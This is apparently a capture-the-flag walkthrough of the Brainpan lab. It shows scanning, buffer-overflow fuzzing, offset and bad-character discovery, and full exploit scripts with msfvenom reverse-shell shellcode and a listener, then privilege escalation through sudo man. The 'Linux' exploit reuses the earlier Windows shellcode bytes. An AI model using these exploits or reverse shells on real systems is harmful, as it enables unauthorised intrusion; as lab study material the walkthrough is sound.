Categories: Walkthrough
Tags: tryhackme, thm, BOF, BufferOverFlow, PrivEsc, PrivEsc-Linux, Man-PrivEsc, manual, man, Linux-Machine
$ nmap -p0-65535 -vvv 10.10.253.240 -T4
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-15 18:56 IST
Initiating Ping Scan at 18:56
Scanning 10.10.253.240 [2 ports]
Completed Ping Scan at 18:56, 0.16s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:56
Completed Parallel DNS resolution of 1 host. at 18:56, 6.54s elapsed
DNS resolution of 1 IPs took 6.54s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating Connect Scan at 18:56
Scanning 10.10.253.240 [2 ports]
Discovered open port 10000/tcp on 10.10.253.240
Discovered open port 9999/tcp on 10.10.253.240
Completed Connect Scan at 18:56, 0.16s elapsed (2 total ports)
Nmap scan report for 10.10.253.240
Host is up, received conn-refused (0.16s latency).
Scanned at 2021-07-15 18:56:17 IST for 7s
PORT STATE SERVICE REASON
9999/tcp open abyss syn-ack
10000/tcp open snet-sensor-mgmt syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.89 seconds
$ nmap -p9999,10000 -sV -sC 10.10.253.240
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-15 18:59 IST
Nmap scan report for 10.10.253.240
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
9999/tcp open abyss?
| fingerprint-strings:
| NULL:
| _| _|
| _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
| _|_| _| _| _| _| _| _| _| _| _| _| _|
| _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
| [________________________ WELCOME TO BRAINPAN _________________________]
|_ ENTER THE PASSWORD
10000/tcp open http SimpleHTTPServer 0.6 (Python 2.7.3)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.3
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.96 seconds
From the scanning phase we can see that a service called brainpan is running on port 9999.
Let's check the logic of brainpan:
$ nc -nv 10.10.253.240 9999
(UNKNOWN) [10.10.253.240] 9999 (?) open
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|
[________________________ WELCOME TO BRAINPAN _________________________]
ENTER THE PASSWORD
>> password
ACCESS DENIED
Once connected, we are greeted with a banner and asked to enter a password.
Let's check the web server.
There is not much on the home page.
Let's fuzz for directories and files:
$ ffuf -t 200 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://10.10.253.240:10000/FUZZ -ic -e .php,.html,.txt,.php3,.php5,php7
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.253.240:10000/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .php .html .txt .php3 .php5 php7
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 200
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
[Status: 200, Size: 215, Words: 7, Lines: 9]
index.html [Status: 200, Size: 215, Words: 7, Lines: 9]
bin [Status: 301, Size: 0, Words: 1, Lines: 1]
:: Progress: [1543829/1543829] :: Job [1/1] :: 172 req/sec :: Duration: [0:00:35] :: Errors: 0 ::
We have a bin directory; let's navigate to it.
Download the file and inspect the binary: it is the same binary that is running on port 9999 on the target server.
Let's fuzz it for a buffer overflow:
#!/usr/bin/env python3
import socket, time, sys

ip = "192.168.30.133"
port = 9999
timeout = 5
password = b"A" * 100

while True:
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            s.connect((ip, port))
            # For receiving the banner
            s.recv(2048)
            print("Fuzzing with {} bytes".format(len(password)))
            # Sending the password
            s.send(password)
            # For receiving the "ACCESS DENIED" message; a timeout here means the service died
            s.recv(1024)
    except:
        print("Fuzzing crashed at {} bytes".format(len(password)))
        sys.exit(0)
    # Grow the input by 100 bytes per round
    password += b"A" * 100
    time.sleep(1)
$ ./fuzzy.py
Fuzzing with 100 bytes
Fuzzing with 200 bytes
Fuzzing with 300 bytes
Fuzzing with 400 bytes
Fuzzing with 500 bytes
Fuzzing with 600 bytes
Fuzzing crashed at 600 bytes
Testing for the crash at roughly 600 bytes:
#!/usr/bin/env python3
import socket
import struct
ip = "192.168.30.133"
port = 9999
total_length = 600
payload = [
b"A"*total_length
]
payload = b"".join(payload)
s = socket.socket()
s.connect((ip, port))
s.recv(2048)
s.send(payload)
s.close()
Finding the offset
msf-pattern_create -l 600
#!/usr/bin/env python3
import socket
ip = "192.168.30.133"
port = 9999
total_length = 600
offset = b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9"
s = socket.socket()
s.connect((ip, port))
s.recv(2048)
s.send(offset)
s.close()
$ msf-pattern_offset -l 600 -q 35724134
[*] Exact match at offset 524
We got the offset as 524.
Verifying the offset:
#!/usr/bin/env python3
import socket
ip = "192.168.30.133"
port = 9999
total_length = 600
offset=524
EIP=b"BBBB"
payload = [ b"A"*offset,
EIP,
b"C"*int(total_length-offset-len(EIP))
]
payload = b"".join(payload)
s = socket.socket()
s.connect( (ip, port))
s.recv(2048)
s.send(payload)
s.close()
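The offset step above relies on msf-pattern_create and msf-pattern_offset. The following is an added example, not part of the original walkthrough, that reproduces the same cyclic-pattern logic in plain Python so the value 524 can be checked without the Metasploit tools; the function names are my own.

```python
import string
import struct
from typing import Optional


def pattern_create(length: int) -> bytes:
    """Build the cyclic pattern in the order pattern_create emits it:
    3-byte units <Upper><lower><digit>, digit cycling fastest
    (Aa0 Aa1 ... Aa9 Ab0 ...). The pattern is non-repeating, so any
    4-byte window identifies a single position."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += f"{upper}{lower}{digit}".encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(eip_value: int, length: int = 600) -> Optional[int]:
    """Map the value the debugger showed in EIP back to its position in the
    pattern. x86 is little-endian, so EIP=0x35724134 holds the bytes
    b'4Ar5' and the search needle must be packed with '<I'."""
    needle = struct.pack("<I", eip_value)
    idx = pattern_create(length).find(needle)
    return idx if idx >= 0 else None


def build_probe(offset: int, eip: bytes = b"BBBB", total_length: int = 600) -> bytes:
    """The verification layout used above: filler up to the saved return
    address, the 4 control bytes, then padding out to the crash length."""
    if offset + len(eip) > total_length:
        raise ValueError("offset + EIP does not fit in total_length")
    return b"A" * offset + eip + b"C" * (total_length - offset - len(eip))


if __name__ == "__main__":
    off = pattern_offset(0x35724134)        # value read from the debugger crash above
    print("offset:", off)                   # 524
    probe = build_probe(off)
    print("EIP slot:", probe[off:off + 4])  # b'BBBB'
```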
Knowing the bad characters
!mona bytearray -b "\x00"
#!/usr/bin/env python3
import socket
ip = "192.168.30.133"
port = 9999
total_length = 600
offset = 524
EIP=b"BBBB"
allchars = b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
payload = [ b"A"*offset,
EIP,
allchars,
b"C"*int(total_length - offset - len(EIP) - len(allchars))
]
payload = b"".join(payload)
s = socket.socket()
s.connect((ip, port))
s.recv(2048)
s.send(payload)
s.close()
!mona compare -f C:\Users\chandu\AppData\Local\VirtualStore\Program Files (x86)\Immunity Inc\Immunity Debugger\bytearray.bin -a 0028F930
From this we know that the null byte is the only bad character.
Finding the address of a JMP ESP instruction to place in EIP:
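The bad-character step above uses "!mona bytearray" and "!mona compare". As an added example that is not part of the original walkthrough, the same two steps in plain Python: build_bytearray() produces the array minus the bytes already known to be bad, and find_bad_chars() compares the sent array against a dump of what landed in memory. The memory dumps in the demo are constructed for illustration, and the function names are my own.

```python
from typing import List


def build_bytearray(exclude: bytes = b"\x00") -> bytes:
    """All 256 byte values except the ones already known to be bad
    (the equivalent of: !mona bytearray -b "\\x00")."""
    return bytes(b for b in range(256) if b not in exclude)


def find_bad_chars(sent: bytes, in_memory: bytes) -> List[int]:
    """Compare the sent array with what the debugger shows in memory.
    Returns the sent byte at every position that was altered, plus the
    first byte that is missing entirely if the copy was truncated.
    Only the FIRST entry is confirmed: a bad byte can shift or truncate
    everything after it, so remove it, regenerate with build_bytearray()
    and resend until this returns []."""
    common = min(len(sent), len(in_memory))
    mismatched = [sent[i] for i in range(common) if sent[i] != in_memory[i]]
    if len(in_memory) < len(sent):
        mismatched.append(sent[len(in_memory)])  # copy stopped at this byte
    return mismatched


def demo() -> dict:
    """Three constructed memory dumps: a clean copy, one where 0x0a was
    rewritten to 0x00 by the target, and one truncated at 0x0d."""
    sent = build_bytearray()
    clean = sent
    rewritten = sent.replace(b"\x0a", b"\x00")
    truncated = sent[:sent.index(0x0d)]
    return {
        "clean": find_bad_chars(sent, clean),
        "rewritten": find_bad_chars(sent, rewritten),
        "truncated": find_bad_chars(sent, truncated),
    }


if __name__ == "__main__":
    for name, bad in demo().items():
        print(name, [hex(b) for b in bad])
```

On the Brainpan binary the only byte the comparison reports is the null terminator, which matches the mona result above.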
!mona jmp -r esp -cpb "\x00"
We got the address 0x311712f3
Generating the payload
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.30.133 LPORT=9898 -b "\x00" -f py
Executing the script
#!/usr/bin/env python3
import socket
import struct
ip = "192.168.30.133"
port = 9999
total_length = 600
offset=524
NEW_EIP = struct.pack("<I", 0x311712f3)
nop_ramp = b"\x90" * 16
#EIP=b"BBBB"
buf = b""
buf += b"\xbd\x9e\xc2\x8d\x91\xda\xdd\xd9\x74\x24\xf4\x5a\x33"
buf += b"\xc9\xb1\x52\x31\x6a\x12\x03\x6a\x12\x83\x5c\xc6\x6f"
buf += b"\x64\x9c\x2f\xed\x87\x5c\xb0\x92\x0e\xb9\x81\x92\x75"
buf += b"\xca\xb2\x22\xfd\x9e\x3e\xc8\x53\x0a\xb4\xbc\x7b\x3d"
buf += b"\x7d\x0a\x5a\x70\x7e\x27\x9e\x13\xfc\x3a\xf3\xf3\x3d"
buf += b"\xf5\x06\xf2\x7a\xe8\xeb\xa6\xd3\x66\x59\x56\x57\x32"
buf += b"\x62\xdd\x2b\xd2\xe2\x02\xfb\xd5\xc3\x95\x77\x8c\xc3"
buf += b"\x14\x5b\xa4\x4d\x0e\xb8\x81\x04\xa5\x0a\x7d\x97\x6f"
buf += b"\x43\x7e\x34\x4e\x6b\x8d\x44\x97\x4c\x6e\x33\xe1\xae"
buf += b"\x13\x44\x36\xcc\xcf\xc1\xac\x76\x9b\x72\x08\x86\x48"
buf += b"\xe4\xdb\x84\x25\x62\x83\x88\xb8\xa7\xb8\xb5\x31\x46"
buf += b"\x6e\x3c\x01\x6d\xaa\x64\xd1\x0c\xeb\xc0\xb4\x31\xeb"
buf += b"\xaa\x69\x94\x60\x46\x7d\xa5\x2b\x0f\xb2\x84\xd3\xcf"
buf += b"\xdc\x9f\xa0\xfd\x43\x34\x2e\x4e\x0b\x92\xa9\xb1\x26"
buf += b"\x62\x25\x4c\xc9\x93\x6c\x8b\x9d\xc3\x06\x3a\x9e\x8f"
buf += b"\xd6\xc3\x4b\x1f\x86\x6b\x24\xe0\x76\xcc\x94\x88\x9c"
buf += b"\xc3\xcb\xa9\x9f\x09\x64\x43\x5a\xda\x4b\x3c\x7a\x9a"
buf += b"\x24\x3f\x82\xbc\x1e\xb6\x64\xaa\x4e\x9f\x3f\x43\xf6"
buf += b"\xba\xcb\xf2\xf7\x10\xb6\x35\x73\x97\x47\xfb\x74\xd2"
buf += b"\x5b\x6c\x75\xa9\x01\x3b\x8a\x07\x2d\xa7\x19\xcc\xad"
buf += b"\xae\x01\x5b\xfa\xe7\xf4\x92\x6e\x1a\xae\x0c\x8c\xe7"
buf += b"\x36\x76\x14\x3c\x8b\x79\x95\xb1\xb7\x5d\x85\x0f\x37"
buf += b"\xda\xf1\xdf\x6e\xb4\xaf\x99\xd8\x76\x19\x70\xb6\xd0"
buf += b"\xcd\x05\xf4\xe2\x8b\x09\xd1\x94\x73\xbb\x8c\xe0\x8c"
buf += b"\x74\x59\xe5\xf5\x68\xf9\x0a\x2c\x29\x09\x41\x6c\x18"
buf += b"\x82\x0c\xe5\x18\xcf\xae\xd0\x5f\xf6\x2c\xd0\x1f\x0d"
buf += b"\x2c\x91\x1a\x49\xea\x4a\x57\xc2\x9f\x6c\xc4\xe3\xb5"
shellcode = buf
payload = [ b"A"*offset,
            NEW_EIP,
            nop_ramp,
            shellcode,
            b"C"*int(total_length - offset - len(NEW_EIP) - len(nop_ramp) - len(shellcode))
]
payload = b"".join(payload)
s = socket.socket()
s.connect((ip, port))
s.recv(2048)
s.send(payload)
s.close()
Getting the initial access
Since the target is a Linux machine, generate a Linux payload this time:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=9898 -b "\x00" -f py
#!/usr/bin/env python3
import socket
import struct

ip = "192.168.30.133"   # target ip
port = 9999
total_length = 600
offset = 524
NEW_EIP = struct.pack("<I", 0x311712f3)
nop_ramp = b"\x90" * 16
# EIP = b"BBBB"
buf = b""   # replace the buf lines below with the payload generated by msfvenom
buf += b"\xbd\x9e\xc2\x8d\x91\xda\xdd\xd9\x74\x24\xf4\x5a\x33"
buf += b"\xc9\xb1\x52\x31\x6a\x12\x03\x6a\x12\x83\x5c\xc6\x6f"
buf += b"\x64\x9c\x2f\xed\x87\x5c\xb0\x92\x0e\xb9\x81\x92\x75"
buf += b"\xca\xb2\x22\xfd\x9e\x3e\xc8\x53\x0a\xb4\xbc\x7b\x3d"
buf += b"\x7d\x0a\x5a\x70\x7e\x27\x9e\x13\xfc\x3a\xf3\xf3\x3d"
buf += b"\xf5\x06\xf2\x7a\xe8\xeb\xa6\xd3\x66\x59\x56\x57\x32"
buf += b"\x62\xdd\x2b\xd2\xe2\x02\xfb\xd5\xc3\x95\x77\x8c\xc3"
buf += b"\x14\x5b\xa4\x4d\x0e\xb8\x81\x04\xa5\x0a\x7d\x97\x6f"
buf += b"\x43\x7e\x34\x4e\x6b\x8d\x44\x97\x4c\x6e\x33\xe1\xae"
buf += b"\x13\x44\x36\xcc\xcf\xc1\xac\x76\x9b\x72\x08\x86\x48"
buf += b"\xe4\xdb\x84\x25\x62\x83\x88\xb8\xa7\xb8\xb5\x31\x46"
buf += b"\x6e\x3c\x01\x6d\xaa\x64\xd1\x0c\xeb\xc0\xb4\x31\xeb"
buf += b"\xaa\x69\x94\x60\x46\x7d\xa5\x2b\x0f\xb2\x84\xd3\xcf"
buf += b"\xdc\x9f\xa0\xfd\x43\x34\x2e\x4e\x0b\x92\xa9\xb1\x26"
buf += b"\x62\x25\x4c\xc9\x93\x6c\x8b\x9d\xc3\x06\x3a\x9e\x8f"
buf += b"\xd6\xc3\x4b\x1f\x86\x6b\x24\xe0\x76\xcc\x94\x88\x9c"
buf += b"\xc3\xcb\xa9\x9f\x09\x64\x43\x5a\xda\x4b\x3c\x7a\x9a"
buf += b"\x24\x3f\x82\xbc\x1e\xb6\x64\xaa\x4e\x9f\x3f\x43\xf6"
buf += b"\xba\xcb\xf2\xf7\x10\xb6\x35\x73\x97\x47\xfb\x74\xd2"
buf += b"\x5b\x6c\x75\xa9\x01\x3b\x8a\x07\x2d\xa7\x19\xcc\xad"
buf += b"\xae\x01\x5b\xfa\xe7\xf4\x92\x6e\x1a\xae\x0c\x8c\xe7"
buf += b"\x36\x76\x14\x3c\x8b\x79\x95\xb1\xb7\x5d\x85\x0f\x37"
buf += b"\xda\xf1\xdf\x6e\xb4\xaf\x99\xd8\x76\x19\x70\xb6\xd0"
buf += b"\xcd\x05\xf4\xe2\x8b\x09\xd1\x94\x73\xbb\x8c\xe0\x8c"
buf += b"\x74\x59\xe5\xf5\x68\xf9\x0a\x2c\x29\x09\x41\x6c\x18"
buf += b"\x82\x0c\xe5\x18\xcf\xae\xd0\x5f\xf6\x2c\xd0\x1f\x0d"
buf += b"\x2c\x91\x1a\x49\xea\x4a\x57\xc2\x9f\x6c\xc4\xe3\xb5"
shellcode = buf
payload = [ b"A"*offset,
            NEW_EIP,
            nop_ramp,
            shellcode,
            b"C"*int(total_length - offset - len(NEW_EIP) - len(nop_ramp) - len(shellcode))
]
payload = b"".join(payload)
s = socket.socket()
s.connect((ip, port))
s.recv(2048)
s.send(payload)
s.close()
By modifying and running the script, we got initial access.
Spawning TTY
whoami
puck
date
Thu Jul 15 10:31:22 CDT 2021
python -c 'import pty; pty.spawn("/bin/bash")'
puck@brainpan:/home/puck$ ^Z
[1] + 10624 suspended nc -nlvp 9898
$ stty raw -echo; fg [1] + 10624 continued nc -nlvp 9898
puck@brainpan:/home/puck$ export TERM=xterm
puck@brainpan:/home/puck$ ls -l /home
total 12
drwx------ 4 anansi anansi 4096 Mar 4 2013 anansi
drwx------ 7 puck puck 4096 Mar 6 2013 puck
drwx------ 3 reynard reynard 4096 Mar 4 2013 reynard
puck@brainpan:/home/puck$ sudo -l
Matching Defaults entries for puck on this host:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User puck may run the following commands on this host:
(root) NOPASSWD: /home/anansi/bin/anansi_util
puck@brainpan:/home/puck$
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util
Usage: /home/anansi/bin/anansi_util [action]
Where [action] is one of:
- network
- proclist
- manual [command]
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util network
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP qlen 1000
link/ether 02:be:d5:89:ab:bf brd ff:ff:ff:ff:ff:ff
inet 10.10.253.240/16 brd 10.10.255.255 scope global eth0
inet6 fe80::be:d5ff:fe89:abbf/64 scope link
valid_lft forever preferred_lft forever
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util proclist
top - 10:38:34 up 2:19, 0 users, load average: 0.00, 0.01, 0.03
Tasks: 72 total, 1 running, 71 sleeping, 0 stopped, 0 zombie
%Cpu(s): 0.1 us, 0.1 sy, 0.0 ni, 99.5 id, 0.2 wa, 0.0 hi, 0.0 si, 0.1 st
KiB Mem: 2064648 total, 135728 used, 1928920 free, 12600 buffers
KiB Swap: 520188 total, 0 used, 520188 free, 82156 cached
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1 root 20 0 3500 1864 1280 S 0.0 0.1 0:00.73 init
2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd
3 root 20 0 0 0 0 S 0.0 0.0 0:00.22 ksoftirqd/0
5 root 20 0 0 0 0 S 0.0 0.0 0:00.21 kworker/u:0
6 root rt 0 0 0 0 S 0.0 0.0 0:00.00 migration/0
7 root rt 0 0 0 0 S 0.0 0.0 0:00.03 watchdog/0
8 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 cpuset
9 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 khelper
10 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kdevtmpfs
11 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 netns
12 root 20 0 0 0 0 S 0.0 0.0 0:00.00 xenwatch
13 root 20 0 0 0 0 S 0.0 0.0 0:00.15 xenbus
14 root 20 0 0 0 0 S 0.0 0.0 0:00.01 sync_supers
15 root 20 0 0 0 0 S 0.0 0.0 0:00.00 bdi-default
16 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 kintegrityd
17 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 kblockd
18 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 ata_sff
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual
No manual entry for manual
puck@brainpan:/home/puck$ man manual
No manual entry for manual
puck@brainpan:/home/puck$
The manual action runs man as root, so we can use the man command to escalate privileges:
sudo /home/anansi/bin/anansi_util manual man